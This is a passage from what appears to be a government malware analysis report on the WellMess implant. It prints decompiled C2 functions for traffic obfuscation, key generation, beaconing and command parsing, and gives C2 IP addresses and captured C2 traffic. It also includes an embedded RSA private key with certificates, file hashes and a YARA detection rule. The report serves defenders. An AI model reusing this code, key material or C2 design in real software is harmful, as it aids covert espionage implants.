4y:Y6l YQgZ6t 0uANCK2 UpHCRc2 cbgnSm. UFu\r\nk:cIT cBH5 Fxk 2Jk. ErKKHod 0dgeQ5e 7MV 8PH0 tsUn. dMd,glf x3Q ZpNEDt FnvMxh IM:p:. lbabsz3EA    \r\n—End Sample Network Traffic—\r\nContained within the “Cookie:” section of the data is simple session information, including a hash that is unique to the target\r\nsystem. The unique hash generated from the target system is computed by calculating the SHA256 hash of various pieces of\r\ninformation about the victim system pieced together into a single string (Figure 2). 
These pieces of information include the\r\ncomputer name, session name, computer name, and user domain.\r\nThis data is RC6 encrypted with a hard-coded key and then Base64 encoded. This Base64 encoding is then encoded with the\r\nfollowing algorithm which generates slightly modified Base64 data that appears to contain spaces between different parts of\r\nthe original Base64 encoded data:\r\n—Begin FromBase64ToNormal Function—\r\npublic static string FromBase64ToNormal(string base64Str)\r\n   {\r\n    int num1 = 0;\r\n    int length1 = base64Str.Length;\r\n    string str1 = base64Str.Replace(\"=\", \" \");\r\n    base64Str = string.Empty;\r\n    string str2 = str1.Replace('+', ',');\r\n    string empty1 = string.Empty;\r\n    string str3 = str2.Replace('/', ':');\r\n    string empty2 = string.Empty;\r\n    StringBuilder stringBuilder = new StringBuilder();\r\n    int length2 = str3.TrimEnd().Length;\r\n    Random random = new Random();\r\n    int startIndex = 0;\r\n    while (startIndex \u003c length2 - 9)\r\n    {\r\n       int length3 = random.Next(3, 8);\r\n       int num2 = startIndex + length3;\r\n       if (num1 \u003e 5 \u0026\u0026 num1 % 5 == 0)\r\n        stringBuilder.Append(str3.Substring(startIndex, length3) + \". \");\r\n       else\r\n        stringBuilder.Append(str3.Substring(startIndex, length3) + \" \");\r\n       startIndex = num2;\r\n       ++num1;\r\n    }\r\n    stringBuilder.Append(str3.Substring(startIndex));\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 12 of 44\n\nstring empty3 = string.Empty;\r\n    return stringBuilder.ToString();\r\n   }\r\n—End FromBase64ToNormal Function—\r\nThe newly encoded string is then broken into two separate parts. The split in the string happens at a random offset (Figure\r\n3). The two new parts of the string are then prepended with random strings followed by an “=“ character. 
Both of the strings\r\nare then Uniform Resource Locator (URL) encoded.\r\nUpon execution, the malware generates an AES key which will be used during C2 sessions. This key is generated via the\r\nfollowing function:\r\n—Begin AES Key Generation Function—\r\npublic static Dictionary\u003cstring, byte[]\u003e GenerateSymmKey()\r\n   {\r\n    Dictionary\u003cstring, byte[]\u003e dictionary = new Dictionary\u003cstring, byte[]\u003e();\r\n    byte[] hash = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(Membership.GeneratePassword(16, 4)));\r\n    byte[] randomBytes = GenerateKeys.GetRandomBytes(8);\r\n    using (RijndaelManaged rijndaelManaged = new RijndaelManaged())\r\n    {\r\n       rijndaelManaged.KeySize = 256;\r\n       rijndaelManaged.BlockSize = 128;\r\n       Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(hash, randomBytes, 1000);\r\n       rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);\r\n       rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);\r\n       dictionary.Add(\"Key\", rijndaelManaged.Key);\r\n       dictionary.Add(\"IV\", rijndaelManaged.IV);\r\n    }\r\n    return dictionary;\r\n   }\r\n—End AES Key Generation Function—\r\nThe malware also contains the following hard-coded public RSA key:\r\n—Begin Pub RSA Key—\r\n\u003cRSAKeyValue\u003e\r\n\u003cModulus\u003e4Dy24gTFNYA/jq6SYiAkdRvY1ieWqM9R8dwo0uL+4GzaRObZEoUaZSHhvfeD1v762+duL1LgAcuXJeRg4PB4cGdpZqjKtB2BKIDJv3h2\r\n\u003c/Modulus\u003e\u003cExponent\u003eAQAB\u003c/Exponent\u003e\u003c/RSAKeyValue\u003e\"\r\n—End Pub RSA Key—\r\nThe encrypted portion of the callout in the main body of the POST is the dynamically generated AES key encrypted with the\r\nhard-coded RSA public key. The following function is utilized to conduct the initial C2 connection to the C2 server. 
The\r\n“Message” variable argument will contain the dynamically generated AES key encrypted utilizing the embedded RSA public\r\nkey.\r\n—Begin SendMessage Function—\r\npublic void SendMessage(string Message, string idMess, string askOrReply, string service)\r\n   {\r\n    TransportProtocol transportProtocol = new TransportProtocol();\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 13 of 44\n\nstring message = transportProtocol.FullMessage(idMess, askOrReply, service);\r\n    string service1 = new RC6(Convert.FromBase64String(Variable.keyRC6), Variable._serverType).Encrypt(message);\r\n    Dictionary\u003cHttpStatusCode, List\u003cstring\u003e\u003e dictionary = transportProtocol.Post(Message, service1, true);\r\n    for (int index = 0; !dictionary.ContainsKey(HttpStatusCode.OK) \u0026\u0026 index \u003c 3; ++index)\r\n    {\r\n       Thread.Sleep(new Random().Next(5, 20) * 1000);\r\n       dictionary = transportProtocol.Post(Message, service1, true);\r\n    }\r\n   }\r\n—End SendMessage Function—\r\nThe malware contains a function named “DownloadVar” which allows the malware to receive and parse messages from the\r\nremote operator. 
As illustrated, the malware will decrypt the body of these messages using the dynamically generated AES\r\nkey mentioned above.\r\n—Begin DownloadVar Function—\r\nprivate static Dictionary\u003cstring, string\u003e DownloadVar(\r\n    string idMess,\r\n    string askOrReply,\r\n    string service,\r\n    bool client)\r\n   {\r\n    List\u003cstring\u003e message = new Transport().ReceiveMessage(idMess, askOrReply, service, client);\r\n    try\r\n    {\r\n       Dictionary\u003cstring, string\u003e dictionary = new ParseMessage(message[0]).Parse();\r\n       if (!dictionary.ContainsKey(\"body\"))\r\n        dictionary.Add(\"body\", message[1]);\r\n       if (dictionary[nameof (service)] == \"p\" || dictionary[\"head\"] == \"C\" || dictionary[\"head\"] == \"G\" || !client)\r\n        return dictionary;\r\n       if (string.IsNullOrEmpty(dictionary[\"body\"]))\r\n        return dictionary;\r\n       try\r\n       {\r\n        byte[] numArray = SymmCrypto.AES_Decrypt(Convert.FromBase64String(dictionary[\"body\"]), Variable.keySymm);\r\n        dictionary[\"body\"] = !dictionary[nameof (service)].StartsWith(\"f\") ? Message.UnPack(numArray) :\r\nMessage.UnPackB(numArray);\r\n        return dictionary;\r\n       }\r\n       catch (FormatException ex)\r\n       {\r\n        return (Dictionary\u003cstring, string\u003e) null;\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 14 of 44\n\n}\r\n    }\r\n    catch (Exception ex)\r\n    {\r\n       return (Dictionary\u003cstring, string\u003e) null;\r\n    }\r\n   }\r\n—End DownloadVar Function—\r\nScreenshots\r\nFigure 2 - Data contained within the \"cookie:\" header of the initial traffic to the remote C2, being encrypted with RC6.\r\nFigure 3 - Malware generating hash unique for the victim system. 
This hash value in an encrypted and encoded format will\r\nbe included in the \"cookie:\" header of the transmissions to the C2 server.\r\nFigure 4 - Encrypted \"cookie:\" header being formatted for transmission of the remote C2 server.\r\n85.93.2.116\r\nTags\r\ncommand-and-control\r\nWhois\r\nQueried whois.ripe.net with \"-B 85.93.2.116\"...\r\n% Information related to '85.93.2.0 - 85.93.2.255'\r\n% Abuse contact for '85.93.2.0 - 85.93.2.255' is 'noc@lubnanet.com'\r\ninetnum:        85.93.2.0 - 85.93.2.255\r\nnetname:        Arcompus-Medianet\r\ndescr:         Arcompus-Medianet\r\ncountry:        LB\r\norg:            ORG-AMIS1-RIPE\r\nadmin-c:        AMN61-RIPE\r\ntech-c:         AMN61-RIPE\r\nstatus:         ASSIGNED PA\r\nmnt-by:         arcompusmedia-mnt\r\ncreated:        2015-10-05T12:27:29Z\r\nlast-modified: 2015-10-05T12:27:59Z\r\nsource:         RIPE\r\norganisation: ORG-AMIS1-RIPE\r\norg-name:     Arcompus Medianet Int. SARL\r\norg-type:     OTHER\r\naddress:        Baabda\r\naddress:        Lebanon\r\ne-mail:         noc@lubnanet.com\r\nabuse-c:        AC32241-RIPE\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 15 of 44\n\nmnt-ref:        arcompusmedia-mnt\r\nmnt-by:         arcompusmedia-mnt\r\ncreated:        2015-10-02T07:33:53Z\r\nlast-modified: 2020-01-03T08:52:39Z\r\nsource:         RIPE\r\nrole:         Network Operations Centre\r\naddress:        15 Saed Fraiha,\r\naddress:        Baabda, 1003,\r\naddress:        Lebanon\r\ne-mail:         noc@lubnanet.com\r\nabuse-mailbox: noc@lubnanet.com\r\nnic-hdl:        AMN61-RIPE\r\nmnt-by:         arcompusmedia-mnt\r\ncreated:        2015-10-02T07:36:29Z\r\nlast-modified: 2020-01-03T08:31:27Z\r\nsource:         RIPE\r\n% Information related to '85.93.2.0/24AS203913'\r\nroute:         85.93.2.0/24\r\ndescr:         ArcompusMedia\r\norigin:         AS203913\r\nmnt-by:         arcompusmedia-mnt\r\ncreated:        2015-12-15T16:27:03Z\r\nlast-modified: 2018-02-06T10:01:56Z\r\nsource:     
    RIPE\r\n% This query was served by the RIPE Database Query Service version 1.97.2 (ANGUS)\r\nRelationships\r\n85.93.2.116 Connected_From 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\nDescription\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 attempts to connect to the IP address.\r\n5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nTags\r\ntrojan\r\nDetails\r\nName 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nSize 6900178 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\r\nMD5 3a9cdd8a5cbc3ab10ad64c4bb641b41f\r\nSHA1 e45f89c923d0361ce8f9c64a63031860a76b2d10\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 16 of 44\n\nSHA256 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\nSHA512 2d1d26081637c925fb6ae5f92b278f87a8253fd65a75c44fdc2c513a24dc9e0658c552ebc9c9c76c70ad948c60901e682184a833aae51a8c4d62\r\nssdeep 49152:hPyt5H89G+YrbjVWMiUMNqb054dzNIdEp+rt1D5TvLlcpigaB5IDPmoFjPnMBbs0:hqHaQKNzVLlhLopfMlsnh8K54\r\nEntropy 6.016965\r\nAntivirus\r\nAntiy Trojan/Linux.WellMess\r\nBitDefender Trojan.Linux.Generic.173705\r\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.Generic.173705 (B)\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = 
\"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 17 of 44\n\nMD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    
$8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 18 of 44\n\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n5ca4a9f655... Connected_To 209.58.186.196\r\n5ca4a9f655... 
Connected_To 141.98.212.55\r\nDescription\r\nThis artifact is an ELF 64-bit file. It has been identified as a variant of the WellMess malware family. When the file is\r\nexecuted, it attempts to create a C2 connection to one of the following IP addresses:\r\n141.98.212.55 over Transmission Control Protocol (TCP) Port 53\r\n209.58.186.196 over TCP Port 443\r\nThe initial C2 connection over port 53 will be a normal WellMess C2 session wherein parts of the message are encrypted\r\nwith RSA and RC6. In contrast, the C2 session via port 443 will be fully secured via a Secure Sockets Layer (SSL) session.\r\nThe following keys and certificates are used to create the secure connection:\r\n—Begin Keys and Certificates—\r\n—Begin Certificate—\r\nMIIDAzCCAeugAwIBAgICBnowDQYJKoZIhvcNAQELBQAwKTEOMAwGA1UEBhMFVHVu\r\naXMxCzAJBgNVBAoTAklUMQowCAYDVQQDEwEqMB4XDTE4MTIxNjA4NTEzNloXDTI5\r\nMDcxNjA3NTEzNlowHTEOMAwGA1UEBhMFVHVuaXMxCzAJBgNVBAoTAklUMIIBIjAN\r\nBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsLZde+H/Bu3mA8xRa2c9DCmdYqnc\r\nvGC1Re9BO3c+kCcUbVqyR2t3mPrDpW4L94MDDHEF7LZ5VcXvNCTrfwRKI+ncoGQr\r\ns6yR0xM7Ru1ObV/E6GdUGvlJMy2WKE3UsiHx2BJ2MnHvKa1yJSt5wjkMKEwqbUHQ\r\nIbLqmwrZ/Ud1AW+tZEs6kfEEuobNfIqLpZDLGT17FGnshqUa+iMnQ9b9Nax42kgm\r\n/2AsD0N0rW8+DOoP7RiCPqsbcUanquxpLqpO9Zyw517wHLpImUn56B+dwnHVWb8o\r\nO5qqikB2X+cq3rnSAaaBAD4JDVdQqS9poEXDnbBdGJczXSPFdx0UrOC5kQIDAQAB\r\no0EwPzAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUF\r\nBwMBMA4GA1UdDgQHBAUBAgMEBjANBgkqhkiG9w0BAQsFAAOCAQEAK/n6JljR5epC\r\nsUDpTz2GMGwnMHu0zOklOhv61AyfeTMC800G8/JbAe7ImueHSSWeV2Gg/tv10wrv\r\nHKMNAkiPxaAK3wSl2391e3+e1SD/fmJNqBJVm2/OegzdezRyujTzwvsVuGIGJknH\r\nehutZmaL6GMYy9BtWs4n8tLgIn+vi7WofawNhPyIYqkvZvitqUhJ5IcIFDkeoiYb\r\n9ThGlPI91X0c+6nxMJSLHdD6D8mVQKDP9CH9Kr7weXeFBE8AbVMi3/Jm6V791/jr\r\nR5Z/j1JiU2o69Cj+31CfqXuIxd712MHSPoqhcXZov8w55MXgvX9NxY31G76X5R3h\r\n71A5grjoww==\r\n—End Certificate—\r\n—Begin 
Certificate—\r\nMIIDEDCCAfigAwIBAgICBnUwDQYJKoZIhvcNAQELBQAwKTEOMAwGA1UEBhMFVHVu\r\naXMxCzAJBgNVBAoTAklUMQowCAYDVQQDEwEqMB4XDTE5MDIwNTExMjgyOVoXDTI5\r\nMDIxNTExMjgyOVowKTEOMAwGA1UEBhMFVHVuaXMxCzAJBgNVBAoTAklUMQowCAYD\r\nVQQDEwEqMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwgjuu797/ixV\r\n8DOeOVSbxihX4RO9TI0CKnveqjzbb7a64fjJxIy/WxcpruLaeC1xhaWfxPeoMVJe\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 19 of 44\n\nFZxdiE59uDLdhRJzItEmoRrxGqcZQ94K6G1YoNFBP7dGzn8J+GSP0JdWrHUGkpaq\r\nW1xFl0zk33AuFwOCJmgQN6TD1lXgwQx90IZFsmBkeZYUQRaNEV6gwSzFQZauZ161\r\nEUsW7WeOJ71uTOqC71NEtXypYFhqpUhmHAABPetoBO1MyBxseaQiji+m5XjWGMfu\r\n0ZuXRpJ4qAGhwrVVbR4MoLWa8VYytGCcMPZoWedmvAOX5wl9Ol9JAL+g2hOY79rS\r\nmoF+Dc/S+QIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAoQwHQYDVR0lBBYwFAYIKwYB\r\nBQUHAwIGCCsGAQUFBwMBMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQAD\r\nggEBAJgenxhajyC5gNQR1e7umh6WWSS8P3ywqKMf1AEHjvrzKoJiUCRQ+BHAf4B0\r\nTNQ4GpMIwDZBAMTmq80lEVZAy3M21Q4+iPzDBDaCV88bqD4AgIwnpxPoaAVUJoXJ\r\n+tBQ7OSz6s8QYJWnMhSqcytj3pLrfUhgkjtBzScx18zL+l21V/v08y+geE3iw/Fh\r\nblGDPjcLPYCuPSFpmy+X+/h0VSvQdV7KvS9B7g7KzA0eR7Y516xKBXmGV80PRJj2\r\nlbi5v2CxdJHggTWt4q4/GB4PAHMFr/dz4qOsSKeryZJcSK2HODtl1Mr5zXdn3DB4\r\nGjt5XCFfp0SzMWhtOIes8N97+lQ=\r\n—End Certificate—\r\n—Begin RSA Private 
Key—\r\nMIIEowIBAAKCAQEAsLZde+H/Bu3mA8xRa2c9DCmdYqncvGC1Re9BO3c+kCcUbVqy\r\nR2t3mPrDpW4L94MDDHEF7LZ5VcXvNCTrfwRKI+ncoGQrs6yR0xM7Ru1ObV/E6GdU\r\nGvlJMy2WKE3UsiHx2BJ2MnHvKa1yJSt5wjkMKEwqbUHQIbLqmwrZ/Ud1AW+tZEs6\r\nkfEEuobNfIqLpZDLGT17FGnshqUa+iMnQ9b9Nax42kgm/2AsD0N0rW8+DOoP7RiC\r\nPqsbcUanquxpLqpO9Zyw517wHLpImUn56B+dwnHVWb8oO5qqikB2X+cq3rnSAaaB\r\nAD4JDVdQqS9poEXDnbBdGJczXSPFdx0UrOC5kQIDAQABAoIBAQCAXRhvQu00JV+u\r\nZp7GPAoWaaxP3T/g/wbutCtYfPhPUnP+M6HJS4Fm+NFhvBypQNvYD8nT94EQE2X9\r\nJMyESaNpjxma0OkF7VdIUnH+xabwwF6Sy2xG48qOiJDI2jCk7Q92e4KshiLKzZla\r\n8sfRlAsGwr0W/HWp5QOSeEF9QIj37udx8zoo68ROFLe3RIbc4VsjN4/rC46K1YHb\r\nOi9J+M2ScFWTjHYAu4Pvrjd8WqvPudF5FG+g4pF9qGhGhM27q37skNHr1REby/UU\r\nQC7zzAUJB9c+Wr+iREDI3psItVzCL7ZXqHpG2qM3VdqMz+m+EN1vnfZWNX4EuaUa\r\nHp/YhOCZAoGBAOiS0Cs6RWtXEnNdSD3ap0M9yqwtrdV7iNcy4PGtIOTICN/3paVF\r\nEatcOowqwpXiihZIEWDAe2QuvlocL4rIDHof42kInr7nM9pMHZia50qtSmGATwTN\r\n3BbqTkK7O2wSbsZoZzRpTMB6kYonsw1xg02jTh+aXTMstpL/2I96v7AvAoGBAMKD\r\nGxUKspKSF9xPkaR1jI3YOp5GYZxhkbR/O4cZgHEClbZlwkd+er63ecvxNoNOYmu9\r\nMdh98t+Dsnv1zrA3cFAxmsmwiAvc/tPpv3KQPVe2XbWza1o9vueHYpSoE/wwjxmK\r\nWOV0Cazihoa0MV+lVyPRhKgCV1xLGcLc8kcD7AI/AoGAQ9WGaAVP+BXmaMWda4UZ\r\n4g/kzEFqgWjNqc7KM1NG09PQWtrVcpXpqGx3Gyjhpmvz0Lnmb6zUkIzdslSkPTtK\r\nAFjKsHj2LEItKo+m1jrgGTTgC/4rjgApIHnop6gKlePucWpEJ9JKs51MU9pubA5e\r\nuMdX4vnYEzQIcGm1FWw8+rsCgYBuLVkvyAlyYHJHhoKWx0bAKdS6Rl+P9uxTcyZC\r\n1j0cxjwLPwSW/puEX+ULkiwwoDu7j0UmveDOnoiBErDqu9xQcGifCfFl1t45JtQc\r\njntQranS/Dg4u3ThLJy4W6RGWzMTYnwMLHg2h3Fv56134e3ECi+8Aud9DcUfzYsm\r\nkqAifQKBgHtMn87pL0wQ8eLpk/5+4fSVR5cCBS9/oBciO/g2g88Grb69g8PTyn99\r\nbhiRlKDfAPnA/+gYtjCMNbyKkCy2Kf4UaWh3cMJnGafFTOci2Uve4zj/SSePAp3O\r\nviyz2EuMK0ZZc4nNBK6leRFq4GEgwZSr7RakpKU1t3vlhMrRDuSI\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 20 of 44\n\n—End RSA Private Key—\r\n—Begin Public 
Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArRiKDue9YA6DUzYu6WQv\r\noWOxp8wel/Ws/5jK1Xsv2f8lJwUDxM+zT4dGL3ZyJLMkbBQk8HyvAm+6331M47vF\r\nsbva2BCzQxdEWO9ey3LnhCtpQOgjypf1QcPy4Kx6jj2BiVEtPP9YBa75QkUNR0oO\r\n0n6PKFP8SX6Mv0UyHqS3tsa8D21nm2hf3rO7sqBXevs9xdvKbxiKLJxY6WEvKAGH\r\n7Q09rndwr4b7gJ56GZGBwVeqkoVmRFM/nNq9aymTOe4PNRdOcpYK7AoT/QjA0IvO\r\nQ5XOapb3iJWHLlxCGfBRT+ISVfg4PVdXev2wsXFe6h3McXHoN7FZgyo10XiP2QZU\r\nRQIDAQAB\r\n—End Public Key—\r\n—End Keys and Certificates—\r\nThe program uses TCP ports 53 and 443 because of the likelihood that these ports would be open on the router. However,\r\noutbound TCP connections initiated on TCP port 53 would be unusual, because this port is typically reserved for the\r\nDomain Name System (DNS) and outbound queries are done using the User Datagram Protocol (UDP) or TCP,\r\nwhile inbound answer records may use both. This activity could be flagged as suspicious.\r\nThe malware contains functions that are similar in design to the .NET version of WellMess\r\n(47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854). Figures 5-7 detail that both implants\r\ncontained similar functions named “Work” and “SendMessage”.\r\nIn addition, this sample contains a function named “botlib_Exec”, which is very similar in design and purpose to the\r\nfunction named “Command” within the file 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854.\r\nBoth implants utilize the same REGEX value to parse executable scripts from data received from a remote operator via a C2\r\nsession (Figure 8).\r\nA primary difference between the implants is that this version initially attempts a C2 session to IP address 141.98.212.55\r\nover port 53. If this C2 server is not available, it will attempt an SSL-secured (port 443) C2 session with the C2 IP address\r\n209.58.186.196. 
The presence of an RSA private key within this implant is likely to facilitate this secure SSL session.\r\n—Begin WellMess C2 session—\r\nPOST / HTTP/1.1\r\nHost: 141.98.212.55:53\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0\r\nContent-Length: 422\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nCookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C;\r\nOVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc+Ew%2Cy5O+Y%2CXTx%2C+Of7mNHE\r\nAccept-Encoding: gzip\r\nDZ0 rUtgNTf e,j:gB DFd dLSYB mq53txH 8JYY75r EQXyIUk 2FqYSrc. xscOr3E rzbl Q494 Gvkb1q sifD6 pog q0Ybz4D\r\nasij. 26sQ PkMZPh1 IyV 8VW 0C3038b QpTy8Cf z6mJw oeg. 6MG8,lQ ymdPXR q1tRd Fxg brhM 7cp Zf9JPKV\r\nCcKyKPK. OFdOqE 6XO oL8kKA qnq 9c2Yc9 ,xm6Gdy ra9 ORzvq. 3BX8q 6rE 2:H 1ALG8G N7yX 8hn3aNR kHykST9\r\nKucSC2. b0l LJBc6i 9hK2 ZtJ1 jLi9cUA 7VRh G6PGAU qM9n5FD. bTy YMzPKF KKnk0i TyYK SMAV sbE 2Jflrk\r\nyPmCpN. 2X35q5 JhXg    \r\n—End WellMess C2 Session—\r\nScreenshots\r\nFigure 5 - This function is similar to the \"Work\" function found within the WellMess sample\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854.\r\nFigure 6 - \"botlib_Work\" function within this WellMess implant, parsing for the same bytes as the \"Work\" function within\r\nWellMess sample 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 21 of 44\n\nFigure 7 - \"botlib.SendMessage\" function found within this WellMess implant, which is similar to the \"SendMessage\" function\r\ncontained within 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854.\r\nFigure 8 - Part of the REGEX value this malware utilizes to parse command information, including executable scripts, from data\r\nreceived from the remote operator. 
